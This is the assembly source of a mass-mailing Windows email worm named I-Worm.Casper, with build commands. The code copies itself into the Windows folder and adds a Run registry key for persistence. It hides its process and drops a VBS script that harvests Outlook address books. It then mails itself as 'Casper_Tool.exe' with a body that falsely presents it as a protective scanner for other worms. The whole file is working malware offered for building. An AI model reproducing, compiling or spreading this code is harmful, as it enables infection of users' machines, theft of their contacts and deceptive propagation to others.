;--- dllz.def
IMPORTS

	WININET.InternetGetConnectedState
	SHLWAPI.SHSetValueA
;---


comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size :  6144 byte (compressed with UPX tool)

Action : Copy itself to
		* WINDOWS\MsWinsock32.exe
	 Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
		* Winsock32 1.0 = WINDOWS\MsWinsock32.exe


To build the worm:
tasm32 /ml /m9 Casper
tlink32 -Tpe -c -x -aa Casper,,,import32,dllz
upx -9 Casper.exe

To delete the worm:
del %windir%\MsWinsock32.exe
del %windir%\CasperEMail.txt

dllz.def file:
IMPORTS

	WININET.InternetGetConnectedState
	SHLWAPI.SHSetValueA


#

.586p
.model flat
.code

JUMPS

callx macro a
extrn a:proc
call a
endm

include useful.inc

DEBUT:
Main_Worm:

	call  Hide_Worm
	call  Copy_Worm
	call  Check_Wsock
	call  Prepare_Spread_Worm

	Connected_:
	push  00h
	push  offset Tmp
	callx InternetGetConnectedState
	dec   eax
	jnz   Connected_

	mov   edi,offset casper_mail
	push  edi
	push  50
	push  edi
	callx GetWindowsDirectoryA
	add   edi,eax
	mov   eax,"saC\"
	stosd
	mov   eax,"Erep"
	stosd
	mov   eax,"liaM"
	stosd
	mov   eax,"txt."
	stosd	
	xor   eax,eax
	stosd

	call  Spread_Worm

Hide_Worm proc
	pushad
	@pushsz "Kernel32.dll"
	callx GetModuleHandleA
	xchg  eax,ecx
	jecxz End_Hide
	@pushsz "RegisterServiceProcess"
	push  ecx
	callx GetProcAddress
	xchg  eax,ecx
	jecxz End_Hide
	push  1
	push  0
	call  ecx
	End_Hide:
	popad
	ret
Hide_Worm endp

Check_Wsock proc
	Search_Wsock:
	push  50
	mov   edi,offset wsock_file
	push  edi
	callx GetSystemDirectoryA
	add   edi,eax
	mov   eax,"osW\"
	stosd
	mov   eax,"23kc"
	stosd
	mov   eax,"lld."
	stosd
	xor   eax,eax
	stosd

	push  offset wsock_file
	callx GetFileAttributesA
	cmp   eax,20h
	jne   End_Wsock

	xor   eax,eax
	push  eax
	push  eax
	push  03h
	push  eax
	push  eax
	push  80000000h or 40000000h
	push  offset wsock_file
	callx CreateFileA
	mov   wsckhdl,eax

	File_Mapping:
	xor   eax,eax
	push  eax
	push  eax
	push  eax
	push  04h
	push  eax
	push  wsckhdl
	callx CreateFileMappingA
	test  eax,eax
	jz    Close_File
	mov   wsckmap,eax

	xor   eax,eax
	push  eax
	push  eax
	push  eax
	push  06h
	push  wsckmap
	callx MapViewOfFile
	test  eax,eax
	jz    Close_Map_File
	mov   esi,eax
	mov   wsckview,eax

	Old_Infect:
	mov   verif,0
	cmp   word ptr [esi],"ZM"
	jne   UnmapView_File
	cmp   byte ptr [esi+12h],"z"
	je    Infected_By_Happy
	cmp   word ptr [esi+38h],"ll"
	je    Infected_By_Icecubes
	jmp   UnmapView_File
	
	Infected_By_Happy:
	push  10h
	push  offset warning
	@pushsz "I-Worm.Happy coded by Spanska"
	push  00h
	callx MessageBoxA
	inc   verif
	jmp   UnmapViewOfFile
	Infected_By_Icecubes:
	push  10h
	push  offset warning
	@pushsz "I-Worm.Icecubes coded by f0re"
	push  00h
	callx MessageBoxA
	inc   verif
	jmp   UnmapViewOfFile
	Already_Infected:
	inc   verif
	jmp   UnmapViewOfFile

	UnmapView_File:
	push  wsckview
	callx UnmapViewOfFile
	Close_Map_File:
	push  offset wsckmap
	callx CloseHandle
	Close_File:
	push  wsckhdl
	callx CloseHandle
	End_Wsock:
	ret
Check_Wsock endp

Copy_Worm proc
	pushad
	Original_Name:
	push  50
	mov   esi,offset original
	push  esi
	push  0
	callx GetModuleFileNameA

	Copy_Name:
	mov   edi,offset copy_name
	push  edi
	push  50
	push  edi
	callx GetWindowsDirectoryA
	add   edi,eax
	mov   eax,'WsM\'
	stosd
	mov   eax,'osni'
	stosd
	mov   eax,'23kc'
	stosd
	mov   eax,'exe.'
	stosd
	pop   edi
	push  0
	push  edi
	push  esi
	callx CopyFileA

	Reg_Registered:
	push  08h
	push  edi
	push  01h
	@pushsz "Winsock32"
	@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
	push  80000002h
	callx SHSetValueA
	push  08h
	@pushsz "PetiK - France - (c)2001"
	push  01h
	@pushsz "Author"
	@pushsz "Software\CasperWorm"
	push  80000001h
	callx SHSetValueA
	push  08h
	@pushsz "1.00"
	push  01h
	@pushsz "Version"
	@pushsz "Software\CasperWorm"
	push  80000001h
	callx SHSetValueA
	popad
	ret
Copy_Worm endp


Prepare_Spread_Worm proc
	pushad
	push  00h
	push  80h
	push  02h
	push  00h
	push  01h
	push  40000000h
	@pushsz "C:\CasperMail.vbs"
	callx CreateFileA
	xchg  edi,eax
	push  00h
	push  offset octets
	push  VBSSIZE
	push  offset vbsd
	push  edi
	callx WriteFile
	push  edi
	callx CloseHandle
	push  1
	@pushsz "wscript C:\CasperMail.vbs"
	callx WinExec
	push  3 * 1000
	callx Sleep
	@pushsz "C:\CasperMail.vbs"
	callx DeleteFileA
	popad
	ret
Prepare_Spread_Worm endp

	Spread_Worm:
	pushad
	push  00h
	push  80h
	push  03h
	push  00h
	push  01h
	push  80000000h
	push  offset casper_mail
	callx CreateFileA
	inc   eax
	test  eax,eax
	je    End_Spread_worm
	dec   eax
	xchg  eax,ebx

	xor   eax,eax
	push  eax
	push  eax
	push  eax
	push  02h
	push  eax
	push  ebx
	callx CreateFileMappingA
	test  eax,eax
	je    F1
	xchg  eax,ebp

	xor   eax,eax
	push  eax
	push  eax
	push  eax
	push  04h
	push  ebp
	callx MapViewOfFile
	test  eax,eax
	je    F2
	xchg  eax,esi

	push  00h
	push  ebx
	callx GetFileSize
	cmp   eax,03h
	jbe   F3

	call  Scan_Mail

	F3:	push  esi
	callx UnmapViewOfFile
	F2:	push  ebp
	callx CloseHandle
	F1:	push  ebx
	callx CloseHandle
	End_Spread_worm:
	popad
	ret

	Scan_Mail:
	pushad
	xor   edx,edx
	mov   edi,offset m_addr
	push  edi
	p_c:  lodsb
	cmp   al," "
	je    car_s
	cmp   al,0dh
	je    entr1
	cmp   al,0ah
	je    entr2
	cmp   al,"#"
	je    f_mail
	cmp   al,"@"
	je    not_a
	inc   edx
	not_a:	stosb
		jmp  p_c
	car_s:	inc  esi
		jmp  p_c
	entr1:	xor  al,al
		stosb
		pop  edi
		test edx,edx
		je   Scan_Mail	
		call Send_Mail
		jmp  Scan_Mail
	entr2:	xor  al,al
		stosb
		pop  edi
		jmp  Scan_Mail
	f_mail:
	FIN:	push  00h
	callx ExitProcess

	Send_Mail:	
	xor   eax,eax
	push  eax
	push  eax
	push  eax
	push  offset Message
	push  [MAPIHdl]
	callx MAPISendMail
	ret


.data
; ===== Main_Worm =====
wsock_file	db 50 dup (0)

; ===== Check_Wsock =====
wsckhdl		dd 0
wsckmap		dd 0
wsckview	dd 0
PEHeader	dd 0
warning		db "Warning : You're infected by",00h
verif		dd ?

; ===== Copy_Worm =====
original	db 50 dup (0)
copy_name	db 50 dup (0)

; ===== Prepare_Spread_Worm =====
octets		dd ?

; ===== Spread_Worm =====
m_addr		db 128 dup (?)
casper_mail	db 50 dup (0)
mail_name	db "Casper_Tool.exe",00h
MAPIHdl		dd 0
Tmp		dd 0

subject		db "Casper Tool Protect 1.00",00h
body		db "Hi,",0dh,0ah
		db "Look at this attachment...",0dh,0ah
		db "This freeware alert you if you infected by "
		db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah
		db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah
		db "The tool Casper v.1.00 scans this specific file and displays a message "
		db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah
		db 09h,09h,09h,"Good Bye and have a nice day",00h

Message		dd ?
		dd offset subject
		dd offset body
		dd ?
		dd ?
		dd ?
		dd 2
		dd offset MsgFrom
		dd 1
		dd offset MsgTo
		dd 1
		dd offset Attach

MsgFrom		dd ?
		dd ?
		dd ?
		dd ?
		dd ?
		dd ?

MsgTo		dd ?
		dd 1
		dd offset m_addr
		dd offset m_addr
		dd ?
		dd ?

Attach		dd ?
		dd ?
		dd ?
		dd offset original
		dd offset mail_name
		dd ?

vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE	= $-vbsd

MAX_PATH		equ 260
FILETIME		struct
dwLowDateTime		dd ?
dwHighDateTime		dd ?
FILETIME		ends
WIN32_FIND_DATA 	struct
dwFileAttributes	dd ?
ftCreationTime		FILETIME ?
ftLastAccessTime	FILETIME ?
ftLastWriteTime		FILETIME ?
nFileSizeHigh		dd ?
nFileSizeLow		dd ?
dwReserved0		dd ?
dwReserved1		dd ?
cFileName		dd MAX_PATH (?)
cAlternateFileName	db 13 dup (?)
			db 3 dup (?)
WIN32_FIND_DATA		ends

Search		WIN32_FIND_DATA <>

end DEBUT
end